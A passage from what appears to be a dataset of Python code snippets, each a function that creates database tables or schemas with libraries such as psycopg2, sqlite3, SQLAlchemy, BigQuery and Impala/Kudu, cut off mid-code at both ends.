{0} (\n LIKE {exceptions_delta_tbl} INCLUDING DEFAULTS\n INCLUDING IDENTITY\n INCLUDING CONSTRAINTS\n INCLUDING STORAGE\n INCLUDING COMMENTS\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname),\n exceptions_delta_tbl=sql.Identifier(self._exceptions_lists_tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_delta_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def create_tables (cls, env=os.environ):\n\n cur = cls.pri_table_read_cursor (env=env)\n cur.execute ('SPECIALCASE gettablelist')\n ret = cur.fetchall ()\n \n existingtables = set ([x[0].lower() for x in ret])\n\n for tabname in (set (cls.table_desc.keys ()) - existingtables):\n sql, lsd = cls.table_desc[tabname]\n epls, desls, sqlprefix = lsd.get_create_labeling (savels=True)\n\n conn = get_labeled_conn (epls, desls)\n cur = conn.cursor ()\n cur.execute (sql)\n conn.close ()\n lsd.pop_labelset ()\n\n \n import psycopg2\n for sql in cls.sql_createindex:\n conn = get_labeled_conn ()\n cur = conn.cursor ()\n # XXX It would be better to check which indices exist as we do for tables.\n try:\n cur.execute (sql)\n except psycopg2.ProgrammingError, e: \n pass\n conn.close ()", "def create_database_tables():\n with APP.app_context():\n DB.create_all()", "def create_tables(self):\n con = self.connect()\n cursor = con.cursor()\n queries = self.tables()\n for query in queries:\n cursor.execute(query)\n cursor.close()\n con.commit()\n con.close()", "def create_all_tables(self):\n pass", "def _create(self):\n with self.pdq:\n c=self.pdq.cursor() \n c.execute('CREATE TABLE pdq (item blob,priority int)')\n c.execute('CREATE INDEX priority_index ON pdq (priority)')", "def createTables(self,table=\"all\"):\n auto=\"\"\n\tif self.dbType==\"mysql\":\n\t auto=\"AUTO_INCREMENT\"\n\t \n\ttableName=\"FileID\"\n if table==\"all\" or table==tableName:\n\t # Drop/create FileID table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"CREATE TABLE %s (\n\t fileid %s %s PRIMARY KEY, \n\t fileName TEXT,\n\t typeid %s\n\t )\n\t \"\"\"%(tableName,self.long,auto,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"KeyFile\"\n\tif table==\"all\" or table==tableName: \n\t # Drop/create KeyFile table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t graphid %s NOT NULL, \n\t view VARCHAR(255) NOT NULL, \n\t run %s NOT NULL, \n\t uid %s, \n\t keyFileId %s NOT NULL, PRIMARY KEY(graphid,view,run,uid) )\n\t \"\"\"%(tableName,self.UINT,self.UINT,self.uid,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\t\n\ttableName=\"RunUID\"\n if table==\"all\" or table==tableName:\n\t # Drop/create RunUID table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t run %s NOT NULL,\n\t uid %s )\n\t \"\"\"%(tableName,self.UINT,self.uid)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"MaxMasterID\"\n if table==tableName:\n\t # Drop/create RunUID table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t masterMaxId %s NOT NULL,\n\t comment TEXT )\n\t \"\"\"%(tableName,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"Location\"\n if table==\"all\" or table==tableName:\n\t # Drop/create Localtion table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t id %s %s PRIMARY KEY,\n\t graphid %s NOT NULL, \n\t run %s NOT NULL, \n\t uid %s, \n\t locationFileId %s NOT NULL )\n\t \"\"\"%(tableName,self.long,auto,self.UINT,self.UINT,self.uid,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t query = \"CREATE INDEX LocationGroups ON Location(graphid,run,uid)\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"Version\"\n if table==\"all\" or table==tableName:\n\t # Drop/create Version table in SQLDB.EventStoreDB\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t id %s %s PRIMARY KEY,\n\t grade VARCHAR(255) NOT NULL, \n\t timeStamp %s NOT NULL, \n\t minRunNumber %s NOT NULL, \n\t maxRunNumber %s NOT NULL, \n\t graphid %s NOT NULL,\n\t state VARCHAR(10) ) \n\t \"\"\"%(tableName,self.long,auto,self.UINT,self.UINT,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"SpecificVersion\"\n if table==\"all\" or table==tableName:\n\t # Drop/create SpecificVersion table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t svName VARCHAR(255) NOT NULL PRIMARY KEY, \n\t svid %s NOT NULL )\n\t \"\"\"%(tableName,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"SpecificVersionComment\"\n if table==\"all\" or table==tableName:\n\t # Drop/create SpecificVersionComment table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t id %s %s NOT NULL PRIMARY KEY,\n\t svid %s NOT NULL,\n\t CommentDate %s,\n\t Comment TEXT )\n\t \"\"\"%(tableName,self.UINT,auto,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"GraphPath\"\n if table==\"all\" or table==tableName:\n\t # Drop/create GraphPath table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t graphid %s NOT NULL PRIMARY KEY, \n\t svid %s NOT NULL )\n\t \"\"\"%(tableName,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"PathDepend\"\n if table==\"all\" or table==tableName:\n\t # Drop/create GraphPath table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"\n\t CREATE TABLE %s (\n\t parentId %s, \n\t childId %s NOT NULL )\n\t \"\"\"%(tableName,self.UINT,self.UINT)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\n\ttableName=\"FileType\"\n if table==\"all\" or table==tableName: \n\t # Drop/create FileType table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"CREATE TABLE %s (\n\t id %s %s PRIMARY KEY, \n\t type VARCHAR(8) NOT NULL,\n\t description TEXT )\n\t \"\"\"%(tableName,self.UINT,auto)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query\n\t\n\ttableName=\"OrphanFileID\"\n if table==\"all\" or table==tableName:\n\t # Drop/create FileType table in SQLDB.EventStore\n\t self.dropTable(tableName)\n\t query = \"\"\"CREATE TABLE %s (\n\t id %s PRIMARY KEY, \n\t dateTime DATETIME,\n\t user VARCHAR(8) NOT NULL )\n\t \"\"\"%(tableName,self.long)\n\t if self.dbType==\"mysql\": query+=\" type=innodb\"\n\t self.updateDBAndLog(query)\n\t if not self.schemaDict.has_key(tableName):\n\t self.schemaDict[tableName]=query", "def create_table(user_id: int, jap_event_id: int) -> Table:\n table = Table(emperor=user_id,\n jap_event_id=jap_event_id,\n status=0)\n\n member = User.query.filter(User.id.__eq__(user_id)).first()\n table.members.append(member)\n\n db.session.add(table)\n db.session.commit()\n\n table_id = table.id\n command = CommandService.create_command(1, table_id)\n table.current_command_id = command.id\n\n db.session.add(table, command)\n db.session.commit()\n return table", "def createTable(self):\n results = self.db.table_create(self.entity).run(self.r)\n time.sleep(5)\n return results", "def create_table(self, conn, create_table_sql):\n try:\n # create a Cursor object and call its .execute() method to perform SQL queries\n c = conn.cursor()\n # execute SQL queries: create a table named card\n c.execute(create_table_sql)\n except Error as e:\n print(e)", "def test_create_container(self):\n pass", "def create_table(opts, stats):\n print(\"--------------------------------------\")\n print(\"Creating table %s\" % (opts.table_name,))\n print(\"--------------------------------------\")\n print(timestamp())\n create_table_ddl = \"CREATE TABLE %s (\" % (opts.table_name,)\n num_bigint_cols = opts.columns - opts.num_string_columns\n assert(num_bigint_cols > 0)\n for i in range(opts.columns):\n coltype = 'STRING'\n if i < num_bigint_cols: coltype = 'BIGINT'\n if i > 0: create_table_ddl += ', '\n create_table_ddl += \"f%d %s\" % (i, coltype)\n if i == 0: create_table_ddl += ' PRIMARY KEY'\n create_table_ddl += \") PARTITION BY HASH(f0) PARTITIONS %d STORED AS KUDU \" % \\\n (opts.partitions, )\n create_table_ddl += \"TBLPROPERTIES ('kudu.num_tablet_replicas' = '%d')\" % \\\n (opts.replication_factor, )\n\n cmd = 'echo \"%s\" | impala-shell -i %s -f -' % (create_table_ddl, opts.impalad_address)\n run_command(opts, cmd)", "def create_tables(self):\n for query in table_create_sql:\n self.cursor.execute(query)\n\n self.commit()", "def create_layers_table():\n\n table_name = f\"{BQ_LAYERS_TABLE}\"", "def _get_db_create_table(self, frame):\r\n\r\n columns = (u',\\n'.\r\n\r\n join([u' `%s` DECIMAL(20,5) DEFAULT NULL COMMENT \"%s\"' %\r\n\r\n (self._get_db_name(name), name) for name in\r\n\r\n frame.index.values]))\r\n\r\n table_name = self._get_db_table_name(frame)\r\n\r\n return (\r\n\r\n u'CREATE TABLE `%s` (\\n' % table_name +\r\n\r\n u' `ticker` VARCHAR(50) NOT NULL COMMENT \"Exchange:Ticker\",\\n' +\r\n\r\n u' `period` DATE NOT NULL COMMENT \"Period\",\\n' +\r\n\r\n u'%s,\\n' % columns +\r\n\r\n u' PRIMARY KEY USING BTREE (`ticker`, `period`),\\n' +\r\n\r\n u' KEY `ix_ticker` USING BTREE (`ticker`))\\n' +\r\n\r\n u'ENGINE=MyISAM DEFAULT CHARSET=utf8\\n' +\r\n\r\n u'COMMENT = \"%s\"' % frame.index.name)", "def __create_table(self):\n\n self.connection = self.db.connect()\n self.metadata = MetaData(self.connection)\n\n self.system = Table(self.table_name, self.metadata,\n Column('timestamp', DateTime(), primary_key=True, nullable=False),\n Column('vibration_sensor', Float()),\n Column('flow', Float()),\n Column('pressure', Float()),\n Column('power_consumption', Float()),\n Column('failure_times', Float()),\n Column('operational', Boolean())\n )\n\n self.metadata.create_all()", "def prespi_AccountBroker_initialize(self, conn, put_timestamp, **kwargs):\n if not self.account:\n raise ValueError(\n 'Attempting to create a new database with no account set')\n self.create_container_table(conn)\n self.create_account_stat_table(conn, put_timestamp)", "def __create_recentconn_table(self):\r\n QtSql.QSqlQuery('''CREATE TABLE IF NOT EXISTS recentconn\r\n (host varchar(255),\r\n port int,\r\n passphrase varchar(255),\r\n UNIQUE (host, port) ON CONFLICT REPLACE)''')", "def create_table():\n sql = sqlite3.connect('data.db')\n cursor = sql.cursor()\n logging.debug(\"Successfully Connected to SQLite\")\n\n cursor.execute(\n '''CREATE TABLE Status\n ([ip] text, [port] integer, [count_requests] integer, [t_start] integer, [protocol] text)'''\n )\n\n cursor.close()", "def _create_table(self):\n query = f\"\"\"CREATE TABLE IF NOT EXISTS {TABLE}(\n member_Id INT,\n memberName VARCHAR(50),\n amount INT,\n date datetime NOT NULL,\n time datetime NOT NULL,\n status VARCHAR(20) NOT NULL DEFAULT 'Completed'\n );\"\"\"\n\n self.cursor.execute(query)\n self.conn.commit()", "def create_new_table():\n dataset = create_dataset()\n table_id = \"{}.{}.corona_cases_table\".format(client.project, dataset.dataset_id)\n table = bigquery.Table(table_id)\n table = client.create_table(table, exists_ok=True)\n print(\n \"Created table {}.{}.{}\".format(table.project, table.dataset_id, table.table_id)\n )\n return table", "async def create_sys_tables(self) -> None:\n await self.conn.execute(\"\"\"CREATE TABLE IF NOT EXISTS tinymud_migrations (\n table_name TEXT,\n level INTEGER\n )\"\"\")", "def db_create_table(db_in, tablename):\n connection = db_in.connection.cursor()\n connection.execute('CREATE TABLE IF NOT EXISTS %s(id INTEGER PRIMARY KEY);' % tablename)", "def create_tables():\n db.create_all()", "def create_tables():\n db.create_all()", "def create_table(self):\n logging.debug('Creating new table')\n if not self._dbconnect or not self._cursor:\n raise Exception('Invalid call to Context Manager method!')\n\n self._cursor.execute(\"create table {} (date text, time text, location text, nodeID text)\".format(self._name))", "def init_tables(self):\n\n settings.Base.metadata.tables[\n 'session_master'].drop(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].drop(bind=settings.engine)\n\n settings.Base.metadata.tables[\n 'session_master'].create(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].create(bind=settings.engine)\n\n logging.info(\"Sessionization Tables created\")", "def _create_schema(self):\n self._conn.executescript(self._db_schema)", "def _CreateTable(db_conn, create_table_sql):\r\n try:\r\n c = db_conn.cursor()\r\n c.execute(create_table_sql)\r\n except Error as e:\r\n print(e)", "def create_tables():\n db.create_all()", "def create(self, table, columns, types, primary_key_index=[], is_ifnotexists=True):\n\n self.lock.acquire()\n try:\n dblist = self.client.get_list_database()\n for dbdict in dblist:\n if self.dbname in dbdict[\"name\"]:\n self.lock.release()\n return True\n\n self.client.create_database(self.dbname)\n except Exception as e:\n raise Exception(\"Error in create statement; InfluxDb, DB=%s\\n\" % self.dbname)\n\n self.lock.release()\n\n return True", "def create_table1():\n connection = connect(\n host=\"localhost\",\n user=\"postgres\",\n password=\"coderslab\",\n database=f\"{name + '_db'}\"\n )\n connection.autocommit = True\n cursor = connection.cursor()\n sql_code2 = \"CREATE TABLE users(id serial PRIMARY KEY, username varchar(255) UNIQUE, hashed_password varchar(80)) \"\n cursor.execute(sql_code2)\n return \"Creating table users...\"", "def _init_db(self):\n cursor = self._main_connection.cursor()\n cursor.execute(self.sql[\"create_table\"])\n self._main_connection.commit()", "def _create_tables():\n from Model.DataAccessor.DbAccessor.DbOrmAccessor import db\n db.create_tables([SubjectType, SubjectRegion, Subject])", "def create_database():\n DB_NAME = 'cloud_storage.db'\n DB_DIRECTORY = 'server_side_storage/'\n db = sqlite3.connect('{}/{}'.format(DB_DIRECTORY, DB_NAME))\n cursor = db.cursor()\n cursor.execute('''CREATE TABLE user_ids\n (row_id INTEGER PRIMARY KEY AUTOINCREMENT, uid TEXT, user_table_name TEXT)''')\n db.commit()\n cursor.close()\n db.close()", "def create_marker_table(self):\n if self.marker_table is None:\n self.marker_table = luigi.configuration.get_config().get('sqlalchemy', 'marker-table', 'table_updates')\n\n engine = self.engine\n\n with engine.begin() as con:\n metadata = sqlalchemy.MetaData()\n if not con.dialect.has_table(con, self.marker_table):\n self.marker_table_bound = sqlalchemy.Table(\n self.marker_table, metadata,\n sqlalchemy.Column(\"ParquetSource\", sqlalchemy.String(128), primary_key=True),\n sqlalchemy.Column(\"TargetTable\", sqlalchemy.String(128)),\n sqlalchemy.Column(\"Environment\", sqlalchemy.String(128)),\n sqlalchemy.Column(\"BackupDate\", sqlalchemy.DateTime),\n sqlalchemy.Column(\"InsertedDate\", sqlalchemy.DateTime, default=datetime.now()))\n metadata.create_all(engine)\n else:\n metadata.reflect(only=[self.marker_table], bind=engine)\n self.marker_table_bound = metadata.tables[self.marker_table]", "def create_all_tables():\n\tcommon_db.create_all_tables()", "def initialize_tables(database_connection_object, logger):\n\n try:\n cmd = \"\"\"\n create table if not exists `services_fingerprint_table` (\n target varchar(20),\n port int,\n name varchar(20),\n version varchar(500))\n \"\"\"\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n database_connection_object.cursor().execute(cmd)\n\n except ProgrammingError as programming_error:\n logger.error(programming_error)\n\n except pymysql.err.Warning as pymysql_warning:\n logger.error(pymysql_warning)", "def sql_create_big_table():\n return \"\"\"\n SELECT\n m.tube_assembly_id as 'tube_assembly_id'\n , m.quantity_1 as 'quantity_component'\n , c.component_id \n , c.component_type_id \n , c.type as component_type \n , c.connection_type_id\n , c.outside_shape\n , c.base_type\n , c.height_over_tube\n , c.bolt_pattern_long\n , c.bolt_pattern_wide\n , c.groove\n , c.base_diameter\n , c.shoulder_diameter\n , c.unique_feature\n , c.orientation\n , c.weight\n , p.supplier\n , p.quote_date\n , p.annual_usage\n , p.min_order_quantity\n , p.bracket_pricing\n , p.quantity\n , p.cost\n FROM\n stg_bill_of_materials m INNER JOIN stg_comp_boss c\n ON m.component_id_1 = c.component_id\n \n INNER JOIN stg_price_quote p\n ON m.tube_assembly_id = p.tube_assembly_id\n \"\"\"", "def create_new_index(self, dict_pg_info):\n # ! Setting if fun can use default setting\n ruler = Rules()\n str_conn = ruler.pg_info_rules(dict_pg_info)\n conn = psycopg2.connect(str_conn)\n\n with conn:\n with conn.cursor() as cur:\n str_create_table = \"CREATE TABLE \" + dict_pg_info['table'] + \" (path varchar PRIMARY KEY);\"\n # ! Check if table already exit\n cur.execute(str_create_table)\n cur.close()\n\n conn.close()", "def create_tables(cur, conn):\n for query in create_table_queries:\n cur.execute(query)\n conn.commit()\n \n print('Tables created.')", "def create_fact_tables(cur,conn):\n\tfor query in create_fact_queries:\n\t\tcur.execute(query)\n\t\tconn.commit()", "def createTables():\n conn = getConnection()\n try:\n cur = conn.cursor()\n for table, query in tables.items():\n cur.execute(query)\n conn.commit()\n except Exception as ex:\n print(\"Failed to create tables:\" )\n print(ex)\n sys.exit(1)", "def create_db_structure(self):\n logger.info(\"Creating CRH database structure.\")\n CrhDbModel.metadata.create_all(bind=self.engine)", "def create_base(self):\r\n self.mycursor.execute(\r\n 'CREATE DATABASE IF NOT EXISTS purbeurre CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci')\r\n self.mycursor.execute('USE purbeurre')", "def create_schema(self):\n schema = '''CREATE TABLE jping (\n ip_address text not null,\n interface text not null,\n hostname text not null,\n ping_results integer not null,\n UNIQUE(ip_address, hostname)\n )\n '''\n self.query(schema)", "def create_new_user_table():\n # Connect to database\n conn = psycopg2.connect(DATABASE_URL, sslmode='require')\n # Open a cursor to perform db operations\n cur = conn.cursor()\n # Create the table\n cur.execute(\"\"\"\n CREATE TABLE test (\n user_id int NOT NULL PRIMARY KEY,\n username varchar(255),\n id_last_message_sent int,\n id_last_message_stickered int,\n count_since_last_stickered int\n );\n \"\"\"\n )\n # Commit and close connection\n conn.commit()\n cur.close()\n conn.close()", "def build_metadata():\n metadata = sa.MetaData()\n\n sa.Table(\n 'hive_blocks', metadata,\n sa.Column('num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('hash', CHAR(40), nullable=False),\n sa.Column('prev', CHAR(40)),\n sa.Column('txs', SMALLINT, server_default='0', nullable=False),\n sa.Column('ops', SMALLINT, server_default='0', nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('hash', name='hive_blocks_ux1'),\n sa.ForeignKeyConstraint(['prev'], ['hive_blocks.hash'], name='hive_blocks_fk1'),\n )\n\n sa.Table(\n 'hive_accounts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('name', VARCHAR(16), nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n #sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('reputation', sa.Float(precision=6), nullable=False, server_default='25'),\n\n sa.Column('display_name', sa.String(20)),\n sa.Column('about', sa.String(160)),\n sa.Column('location', sa.String(30)),\n sa.Column('website', sa.String(100)),\n sa.Column('profile_image', sa.String(1024), nullable=False, server_default=''),\n sa.Column('cover_image', sa.String(1024), nullable=False, server_default=''),\n\n sa.Column('followers', sa.Integer, nullable=False, server_default='0'),\n sa.Column('following', sa.Integer, nullable=False, server_default='0'),\n\n sa.Column('proxy', VARCHAR(16), nullable=False, server_default=''),\n sa.Column('post_count', sa.Integer, nullable=False, server_default='0'),\n sa.Column('proxy_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('vote_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('kb_used', sa.Integer, nullable=False, server_default='0'), # deprecated\n sa.Column('rank', sa.Integer, nullable=False, server_default='0'),\n\n sa.Column('lastread_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('active_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('cached_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('raw_json', sa.Text),\n\n\n sa.UniqueConstraint('name', name='hive_accounts_ux1'),\n sa.Index('hive_accounts_ix1', 'vote_weight', 'id'), # core: quick ranks\n sa.Index('hive_accounts_ix2', 'name', 'id'), # core: quick id map\n sa.Index('hive_accounts_ix3', 'vote_weight', 'name', postgresql_ops=dict(name='varchar_pattern_ops')), # API: lookup\n sa.Index('hive_accounts_ix4', 'id', 'name'), # API: quick filter/sort\n sa.Index('hive_accounts_ix5', 'cached_at', 'name'), # core/listen sweep\n )\n\n sa.Table(\n 'hive_posts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('parent_id', sa.Integer),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.Column('depth', SMALLINT, nullable=False),\n sa.Column('is_deleted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_pinned', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_muted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_valid', BOOLEAN, nullable=False, server_default='1'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n\n sa.ForeignKeyConstraint(['author'], ['hive_accounts.name'], name='hive_posts_fk1'),\n sa.ForeignKeyConstraint(['parent_id'], ['hive_posts.id'], name='hive_posts_fk3'),\n sa.UniqueConstraint('author', 'permlink', name='hive_posts_ux1'),\n sa.Index('hive_posts_ix3', 'author', 'depth', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: author blog/comments\n sa.Index('hive_posts_ix4', 'parent_id', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: fetching children\n sa.Index('hive_posts_ix5', 'id', postgresql_where=sql_text(\"is_pinned = '1' AND is_deleted = '0'\")), # API: pinned post status\n sa.Index('hive_posts_ix6', 'community_id', 'id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_pinned = '1' AND is_deleted = '0'\")), # API: community pinned\n )\n\n sa.Table(\n 'hive_post_tags', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('tag', sa.String(32), nullable=False),\n sa.UniqueConstraint('tag', 'post_id', name='hive_post_tags_ux1'), # core\n sa.Index('hive_post_tags_ix1', 'post_id'), # core\n )\n\n sa.Table(\n 'hive_follows', metadata,\n sa.Column('follower', sa.Integer, nullable=False),\n sa.Column('following', sa.Integer, nullable=False),\n sa.Column('state', SMALLINT, nullable=False, server_default='1'),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('following', 'follower', name='hive_follows_ux3'), # core\n sa.Index('hive_follows_ix5a', 'following', 'state', 'created_at', 'follower'),\n sa.Index('hive_follows_ix5b', 'follower', 'state', 'created_at', 'following'),\n )\n\n sa.Table(\n 'hive_reblogs', metadata,\n sa.Column('account', VARCHAR(16), nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.ForeignKeyConstraint(['account'], ['hive_accounts.name'], name='hive_reblogs_fk1'),\n sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_reblogs_fk2'),\n sa.UniqueConstraint('account', 'post_id', name='hive_reblogs_ux1'), # core\n sa.Index('hive_reblogs_ix1', 'post_id', 'account', 'created_at'), # API -- not yet used\n )\n\n sa.Table(\n 'hive_payments', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('tx_idx', SMALLINT, nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('from_account', sa.Integer, nullable=False),\n sa.Column('to_account', sa.Integer, nullable=False),\n sa.Column('amount', sa.types.DECIMAL(10, 3), nullable=False),\n sa.Column('token', VARCHAR(5), nullable=False),\n\n sa.ForeignKeyConstraint(['from_account'], ['hive_accounts.id'], name='hive_payments_fk1'),\n sa.ForeignKeyConstraint(['to_account'], ['hive_accounts.id'], name='hive_payments_fk2'),\n sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_payments_fk3'),\n )\n\n sa.Table(\n 'hive_feed_cache', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('account_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.UniqueConstraint('post_id', 'account_id', name='hive_feed_cache_ux1'), # core\n sa.Index('hive_feed_cache_ix1', 'account_id', 'post_id', 'created_at'), # API (and rebuild?)\n )\n\n sa.Table(\n 'hive_posts_cache', metadata,\n sa.Column('post_id', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n\n # important/index\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('depth', SMALLINT, nullable=False, server_default='0'),\n sa.Column('children', SMALLINT, nullable=False, server_default='0'),\n\n # basic/extended-stats\n sa.Column('author_rep', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('flag_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('total_votes', sa.Integer, nullable=False, server_default='0'),\n sa.Column('up_votes', sa.Integer, nullable=False, server_default='0'),\n\n # basic ui fields\n sa.Column('title', sa.String(255), nullable=False, server_default=''),\n sa.Column('preview', sa.String(1024), nullable=False, server_default=''),\n sa.Column('img_url', sa.String(1024), nullable=False, server_default=''),\n\n # core stats/indexes\n sa.Column('payout', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('created_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('payout_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('updated_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('is_paidout', BOOLEAN, nullable=False, server_default='0'),\n\n # ui flags/filters\n sa.Column('is_nsfw', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_declined', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_full_power', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_hidden', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_grayed', BOOLEAN, nullable=False, server_default='0'),\n\n # important indexes\n sa.Column('rshares', sa.BigInteger, nullable=False, server_default='0'),\n sa.Column('sc_trend', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('sc_hot', sa.Float(precision=6), nullable=False, server_default='0'),\n\n # bulk data\n sa.Column('body', TEXT),\n sa.Column('votes', TEXT),\n sa.Column('json', sa.Text),\n sa.Column('raw_json', sa.Text),\n\n # index: misc\n sa.Index('hive_posts_cache_ix3', 'payout_at', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # core: payout sweep\n sa.Index('hive_posts_cache_ix8', 'category', 'payout', 'depth', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: tag stats\n\n # index: ranked posts\n sa.Index('hive_posts_cache_ix2', 'promoted', postgresql_where=sql_text(\"is_paidout = '0' AND promoted > 0\")), # API: promoted\n\n sa.Index('hive_posts_cache_ix6a', 'sc_trend', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending todo: depth=0\n sa.Index('hive_posts_cache_ix7a', 'sc_hot', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot todo: depth=0\n sa.Index('hive_posts_cache_ix6b', 'post_id', 'sc_trend', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending, filtered todo: depth=0\n sa.Index('hive_posts_cache_ix7b', 'post_id', 'sc_hot', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot, filtered todo: depth=0\n\n sa.Index('hive_posts_cache_ix9a', 'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout todo: rem depth\n sa.Index('hive_posts_cache_ix9b', 'category', 